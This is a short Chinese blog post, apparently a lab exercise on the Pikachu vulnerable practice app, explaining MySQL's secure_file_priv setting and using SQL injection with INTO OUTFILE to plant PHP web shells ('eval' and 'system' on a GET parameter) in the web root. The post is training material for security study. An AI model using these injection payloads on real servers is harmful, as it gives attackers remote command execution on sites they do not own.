Pikachu-Sql-Inject - 通过sql进行远程服务器控制(试验)

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。

查看命令:

复制代码
show variables like "secure%" 
//或者
select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

into outfile ,将select 的结果写入到指定的文件中;

复制代码
vince' union select " <?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"#
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/www/html/2.php"#

//构造sql
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/lib/mysql-files/2.php"#

执行sql语句

进入到服务器目录下,看到文件已生成;

这个实验有三个前提条件:

1、需要知道远程服务器的文件目录;

2、需要该目录有写权限;

3、需要数据库开启secure_file_priv权限;

相关推荐
Paul_09201 小时前
golang面经——内存相关模块
服务器·网络·golang
-dzk-7 小时前
【3DGS复现】Autodl服务器复现3DGS《简单快速》《一次成功》《新手练习复现必备》
运维·服务器·python·计算机视觉·3d·三维重建·三维
Pika8 小时前
深入浅出 Compose 测量机制
android·android jetpack·composer
编程充电站pro9 小时前
SQL 面试高频:INNER JOIN vs LEFT JOIN 怎么考?
数据库·sql
这周也會开心9 小时前
SQL-窗口函数做题总结
数据库·sql
利刃大大9 小时前
【高并发服务器】三、正则表达式的使用
服务器·c++·正则表达式·项目
芝士小宇9 小时前
tcp 服务器的设计思路
服务器·网络·tcp/ip
wu~9709 小时前
web服务器有哪些?服务器和web服务器有什么区别
运维·服务器·前端
₯㎕星空&繁华9 小时前
阿里云服务器安装MySQL服务器
服务器·ubuntu·阿里云·云计算
爱倒腾的老唐9 小时前
13、Linux 基本权限
linux·运维·服务器